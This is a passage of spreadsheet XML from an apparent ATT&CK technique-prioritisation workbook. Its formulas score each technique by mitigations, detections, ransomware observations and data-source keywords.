        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>0.11293714285714286</v>
      </c>
      <c r="AQ442" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>4.3123809523809536E-2</v>
      </c>
      <c r="AR442" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>4.3123809523809536E-2</v>
      </c>
      <c r="AS442" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0.14285714285714285</v>
      </c>
      <c r="AT442" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0.14285714285714285</v>
      </c>
      <c r="AU44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43" spans="1:47">
      <c r="A443" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>7.9603809523809521E-2</v>
      </c>
      <c r="B443" s="25">
        <f>SUM(H443,M443,V443)*(1+SUM(AE443,AG443,AI443,AK443,AM443))</f>
        <v>0.12937142857142861</v>
      </c>
      <c r="C443" s="25" t="s">
        <v>1653</v>
      </c>
      <c r="D443" s="25" t="s">
        <v>119</v>
      </c>
      <c r="E443" s="25" t="s">
        <v>1654</v>
      </c>
      <c r="F443" s="51">
        <v>1</v>
      </c>
      <c r="G443" s="51">
        <v>1</v>
      </c>
      <c r="H443" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I443">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J443">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K443">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L443">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M443" s="25">
        <v>0</v>
      </c>
      <c r="N443" s="51">
        <v>0</v>
      </c>
      <c r="O443" s="51">
        <v>2</v>
      </c>
      <c r="P443" s="51">
        <v>1</v>
      </c>
      <c r="Q443" s="51">
        <v>0</v>
      </c>
      <c r="R443" s="51"/>
      <c r="S443" s="51">
        <v>0</v>
      </c>
      <c r="T443" s="51"/>
      <c r="U443" s="51">
        <v>0</v>
      </c>
      <c r="V443" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>1.4285714285714284E-2</v>
      </c>
      <c r="W443">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>0</v>
      </c>
      <c r="X443">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0</v>
      </c>
      <c r="Y443">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="Z443">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>3</v>
      </c>
      <c r="AA443">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.03</v>
      </c>
      <c r="AB443">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.03</v>
      </c>
      <c r="AC443" s="29" t="s">
        <v>122</v>
      </c>
      <c r="AD443" s="25" t="str" cm="1">
        <f t="array" ref="AD443">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC443)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AE443" s="25">
        <f>IF(AD443="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0</v>
      </c>
      <c r="AF443" s="25" t="str" cm="1">
        <f t="array" ref="AF443">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC443)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG443" s="25">
        <f>IF(AF443="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH443" s="25" t="str" cm="1">
        <f t="array" ref="AH443">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC443)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI443" s="25">
        <f>IF(AH443="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ443" s="25" t="str" cm="1">
        <f t="array" ref="AJ443">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC443)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK443" s="25">
        <f>IF(AJ443="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL443" s="25" t="str" cm="1">
        <f t="array" ref="AL443">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC443)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM443" s="25">
        <f>IF(AL443="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN443" s="59">
        <v>2</v>
      </c>
      <c r="AO443" s="51">
        <v>1</v>
      </c>
      <c r="AP443" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>7.9603809523809521E-2</v>
      </c>
      <c r="AQ443" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>4.3123809523809536E-2</v>
      </c>
      <c r="AR443" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>4.3123809523809536E-2</v>
      </c>
      <c r="AS443" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>9.5238095238095233E-2</v>
      </c>
      <c r="AT443" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>9.5238095238095233E-2</v>
      </c>
      <c r="AU44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44" spans="1:47" ht="48">
      <c r="A444" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>1.5954285714285716E-2</v>
      </c>
      <c r="B444" s="25">
        <f>SUM(H444,M444,V444)*(1+SUM(AE444,AG444,AI444,AK444,AM444))</f>
        <v>0.15954285714285715</v>
      </c>
      <c r="C444" s="25" t="s">
        <v>1655</v>
      </c>
      <c r="D444" s="25" t="s">
        <v>238</v>
      </c>
      <c r="E444" s="25" t="s">
        <v>1656</v>
      </c>
      <c r="F444" s="51">
        <v>1</v>
      </c>
      <c r="G444" s="51">
        <v>1</v>
      </c>
      <c r="H444" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I444">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J444">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K444">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L444">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M444" s="25">
        <v>0</v>
      </c>
      <c r="N444" s="51">
        <v>0</v>
      </c>
      <c r="O444" s="51">
        <v>3</v>
      </c>
      <c r="P444" s="51">
        <v>0</v>
      </c>
      <c r="Q444" s="51">
        <v>0</v>
      </c>
      <c r="R444" s="51"/>
      <c r="S444" s="51">
        <v>0</v>
      </c>
      <c r="T444" s="51"/>
      <c r="U444" s="51">
        <v>0</v>
      </c>
      <c r="V444" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>1.4285714285714284E-2</v>
      </c>
      <c r="W444">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>0</v>
      </c>
      <c r="X444">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0</v>
      </c>
      <c r="Y444">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="Z444">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>3</v>
      </c>
      <c r="AA444">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.03</v>
      </c>
      <c r="AB444">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.03</v>
      </c>
      <c r="AC444" s="29" t="s">
        <v>1387</v>
      </c>
      <c r="AD444" s="25" t="str" cm="1">
        <f t="array" ref="AD444">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC444)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE444" s="25">
        <f>IF(AD444="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF444" s="25" t="str" cm="1">
        <f t="array" ref="AF444">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC444)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG444" s="25">
        <f>IF(AF444="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH444" s="25" t="str" cm="1">
        <f t="array" ref="AH444">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC444)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AI444" s="25">
        <f>IF(AH444="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0</v>
      </c>
      <c r="AJ444" s="25" t="str" cm="1">
        <f t="array" ref="AJ444">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC444)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AK444" s="25">
        <f>IF(AJ444="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AL444" s="25" t="str" cm="1">
        <f t="array" ref="AL444">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC444)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM444" s="25">
        <f>IF(AL444="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN444" s="52">
        <v>0</v>
      </c>
      <c r="AO444" s="51">
        <v>0</v>
      </c>
      <c r="AP444" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>1.5954285714285716E-2</v>
      </c>
      <c r="AQ444" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>5.3180952380952384E-2</v>
      </c>
      <c r="AR444" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>5.3180952380952384E-2</v>
      </c>
      <c r="AS444" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT444" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU44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45" spans="1:47" ht="32.1">
      <c r="A445" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>1.5200000000000002E-2</v>
      </c>
      <c r="B445" s="25">
        <f>SUM(H445,M445,V445)*(1+SUM(AE445,AG445,AI445,AK445,AM445))</f>
        <v>0.15200000000000002</v>
      </c>
      <c r="C445" s="25" t="s">
        <v>1657</v>
      </c>
      <c r="D445" s="25" t="s">
        <v>1658</v>
      </c>
      <c r="E445" s="25" t="s">
        <v>89</v>
      </c>
      <c r="F445" s="51">
        <v>1</v>
      </c>
      <c r="G445" s="51">
        <v>1</v>
      </c>
      <c r="H445" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I445">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J445">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K445">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L445">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M445" s="25">
        <v>0</v>
      </c>
      <c r="N445" s="51">
        <v>0</v>
      </c>
      <c r="O445" s="51">
        <v>1</v>
      </c>
      <c r="P445" s="51">
        <v>0</v>
      </c>
      <c r="Q445" s="51">
        <v>2</v>
      </c>
      <c r="R445" s="51"/>
      <c r="S445" s="51">
        <v>0</v>
      </c>
      <c r="T445" s="51"/>
      <c r="U445" s="51">
        <v>0</v>
      </c>
      <c r="V445" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>1.4285714285714284E-2</v>
      </c>
      <c r="W445">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>0</v>
      </c>
      <c r="X445">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0</v>
      </c>
      <c r="Y445">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="Z445">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>3</v>
      </c>
      <c r="AA445">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.03</v>
      </c>
      <c r="AB445">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.03</v>
      </c>
      <c r="AC445" s="29" t="s">
        <v>346</v>
      </c>
      <c r="AD445" s="25" t="str" cm="1">
        <f t="array" ref="AD445">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC445)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE445" s="25">
        <f>IF(AD445="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF445" s="25" t="str" cm="1">
        <f t="array" ref="AF445">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC445)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG445" s="25">
        <f>IF(AF445="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH445" s="25" t="str" cm="1">
        <f t="array" ref="AH445">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC445)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI445" s="25">
        <f>IF(AH445="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ445" s="25" t="str" cm="1">
        <f t="array" ref="AJ445">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC445)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK445" s="25">
        <f>IF(AJ445="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL445" s="25" t="str" cm="1">
        <f t="array" ref="AL445">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC445)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM445" s="25">
        <f>IF(AL445="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN445" s="60">
        <v>0</v>
      </c>
      <c r="AO445" s="51">
        <v>0</v>
      </c>
      <c r="AP445" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>1.5200000000000002E-2</v>
      </c>
      <c r="AQ445" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>5.0666666666666672E-2</v>
      </c>
      <c r="AR445" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>5.0666666666666672E-2</v>
      </c>
      <c r="AS445" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT445" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU44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46" spans="1:47" ht="32.1">
      <c r="A446" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>1.2937142857142861E-2</v>
      </c>
      <c r="B446" s="25">
        <f>SUM(H446,M446,V446)*(1+SUM(AE446,AG446,AI446,AK446,AM446))</f>
        <v>0.12937142857142861</v>
      </c>
      <c r="C446" s="25" t="s">
        <v>1659</v>
      </c>
      <c r="D446" s="25" t="s">
        <v>202</v>
      </c>
      <c r="E446" s="25" t="s">
        <v>1660</v>
      </c>
      <c r="F446" s="51">
        <v>1</v>
      </c>
      <c r="G446" s="51">
        <v>1</v>
      </c>
      <c r="H446" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I446">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J446">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K446">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L446">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M446" s="25">
        <v>0</v>
      </c>
      <c r="N446" s="51">
        <v>1</v>
      </c>
      <c r="O446" s="51">
        <v>0</v>
      </c>
      <c r="P446" s="51">
        <v>1</v>
      </c>
      <c r="Q446" s="51">
        <v>1</v>
      </c>
      <c r="R446" s="51"/>
      <c r="S446" s="51">
        <v>0</v>
      </c>
      <c r="T446" s="51"/>
      <c r="U446" s="51">
        <v>0</v>
      </c>
      <c r="V446" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>1.4285714285714284E-2</v>
      </c>
      <c r="W446">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>0</v>
      </c>
      <c r="X446">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0</v>
      </c>
      <c r="Y446">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="Z446">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>3</v>
      </c>
      <c r="AA446">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.03</v>
      </c>
      <c r="AB446">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.03</v>
      </c>
      <c r="AC446" s="29" t="s">
        <v>1661</v>
      </c>
      <c r="AD446" s="25" t="str" cm="1">
        <f t="array" ref="AD446">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC446)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AE446" s="25">
        <f>IF(AD446="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0</v>
      </c>
      <c r="AF446" s="25" t="str" cm="1">
        <f t="array" ref="AF446">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC446)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG446" s="25">
        <f>IF(AF446="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH446" s="25" t="str" cm="1">
        <f t="array" ref="AH446">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC446)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI446" s="25">
        <f>IF(AH446="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ446" s="25" t="str" cm="1">
        <f t="array" ref="AJ446">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC446)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK446" s="25">
        <f>IF(AJ446="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL446" s="25" t="str" cm="1">
        <f t="array" ref="AL446">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC446)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM446" s="25">
        <f>IF(AL446="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN446" s="52">
        <v>0</v>
      </c>
      <c r="AO446" s="51">
        <v>0</v>
      </c>
      <c r="AP446" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>1.2937142857142861E-2</v>
      </c>
      <c r="AQ446" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>4.3123809523809536E-2</v>
      </c>
      <c r="AR446" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>4.3123809523809536E-2</v>
      </c>
      <c r="AS446" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT446" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU44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47" spans="1:47">
      <c r="A447" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>3.9761904761904762E-2</v>
      </c>
      <c r="B447" s="25">
        <f>SUM(H447,M447,V447)*(1+SUM(AE447,AG447,AI447,AK447,AM447))</f>
        <v>6.4285714285714279E-2</v>
      </c>
      <c r="C447" s="25" t="s">
        <v>1662</v>
      </c>
      <c r="D447" s="25" t="s">
        <v>1663</v>
      </c>
      <c r="E447" s="25" t="s">
        <v>1664</v>
      </c>
      <c r="F447" s="51">
        <v>0</v>
      </c>
      <c r="G447" s="51">
        <v>1</v>
      </c>
      <c r="H447" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.05</v>
      </c>
      <c r="I447">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0</v>
      </c>
      <c r="J447">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0</v>
      </c>
